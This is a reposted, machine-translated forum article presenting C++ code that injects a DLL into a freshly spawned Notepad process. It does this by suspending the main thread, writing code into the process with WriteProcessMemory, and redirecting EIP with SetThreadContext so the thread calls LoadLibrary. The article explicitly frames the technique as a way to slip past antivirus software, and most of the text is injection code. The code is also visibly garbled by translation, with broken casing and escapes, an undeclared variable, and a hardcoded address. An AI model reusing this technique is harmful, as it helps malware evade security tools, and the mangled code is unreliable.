Window Injection DLL

The following is a good article found on the forum today:

From here: http://topic.csdn.net/u/20110218/17/4c366b82-1107-4a2d-ba0d-291c2f62b76f.html

Copy the file here for later viewing !!!

 

Currently, the DLL Injection Technology in Windows is basically two types.
1: hook setwindowshook
2: Create a remote thread createremotethread
Although remote DLL injection can be implemented, it is difficult to escape anti-virus software, especially createremotethread.
Generally, it is very difficult to monitor anti-virus software. Here we provide a clever way to use the target process (specifically thread)
Manually call loadlibrary to load DLL.

Let's think about it. In Windows, the VC debugger can debug running processes with powerful functions.
What about the debugger mechanism? The debugger mechanism can be roughly divided into the following steps:
1: OpenProcess () gets the target process sentence Bing and has the debugging permission (this permission is not required here)
2: suspendthread () suspends the main thread of the target process
3: getthreadcontext () and setthreadcontext () read and write the current CPU context information of the target thread.
4: readprocessmemory () and writeprocessmemory () read and write the memory data of the target process.

Okay. What is a good method for us? Getthreadcontext (), setthreadcontext ()
These two API functions are not only friends, but also our best friends ).
The following code is provided:
1: our own DLL
Bool apientry dllmain (handle hmodule, DWORD ul_reason_for_call, lpvoid lpreserved
{
// It is very simple. We don't want to destroy it, so we can close the information box.
: MessageBox (0, "!!! ", 0, 0 );
Return true;
}
2: our main program
Typedef hmodule (_ stdcall * ploadlibrary) (lpcstr lplibfilename );
Void test ()
{
// You cannot directly use a constant string. Otherwise, an exception occurs when the target process reads data.
Char dllname [] = {'C', ':', '//', 'D', 'l', 'l', 't', 'E ', 'S ','t ','. ', 'D', 'l', 'l','/0 '};
// The absolute address of the loadlibrary function 2088770939 must be used (in my XP, this address should be obtained in my own windows)
Ploadlibrary pfunc = ploadlibrary (2088770939 );
// Call loadlibrary because the absolute address of the loadlibrary function in every process in Windows is the same.
Pfunc (dllname );
Return;
}
// The following are the injection control functions.
# Include <windows. h>
Void inject ()
{
Context context;
Memset (& context, 0, sizeof (context ));
Context. contextflags = context_control;
Process_information piprocinfo;
Startupinfo sistartinfo;
Zeromemory (& piprocinfo, sizeof (process_information ));
Zeromemory (& sistartinfo, sizeof (startupinfo ));
Sistartinfo. cb = sizeof (startupinfo );
Bool Bok = CreateProcess (null,
"C: // windows // system32 // notepad.exe", // command line
Null, // process security attributes
Null, // primary thread security attributes
False, // handles are inherited
0, // creation flags
Null, // use parent's Environment
"C: // windows // system32 //", // use parent's current directory
& Sistartinfo, // startupinfo pointer
& Piprocinfo); // your es process_information

: Waitforinputidle (piprocinfo. hprocess,-1 );
// Allocate space for the target process
Lpvoid premote =: virtualallocex (piprocinfo. hprocess, 0,4096, mem_reserve | mem_commit, page_execute_readwrite );
DWORD dwriten = 0, id = 0;
// Write the test function to the target process
: Writeprocessmemory (piprocinfo. hprocess, premote, (lpvoid) test, 1024, & dwriten );
// Suspend the main thread of the target process
: Suspendthread (piprocinfo. hthread );
// Obtain the CPU context information of the target thread
I =: getthreadcontext (piprocinfo. hthread, & context );
// Change the EIP command to copy the test function.
Context. EIP = (long) premote;
// Set the CPU context information of the target thread
I =: setthreadcontext (piprocinfo. hthread, & context );
// Wake up the target thread,
: Resumethread (piprocinfo. hthread );
// The target thread will execute our test function at this time, and will continue following
// Execute the original code sequence.
Return 0;
}

The above code has been tested, and we have indeed completed DLL injection and anti-virus software by comparing the "audible ".
It will not be noticed (unless the process DLL module is periodically scanned. The system will be slow ).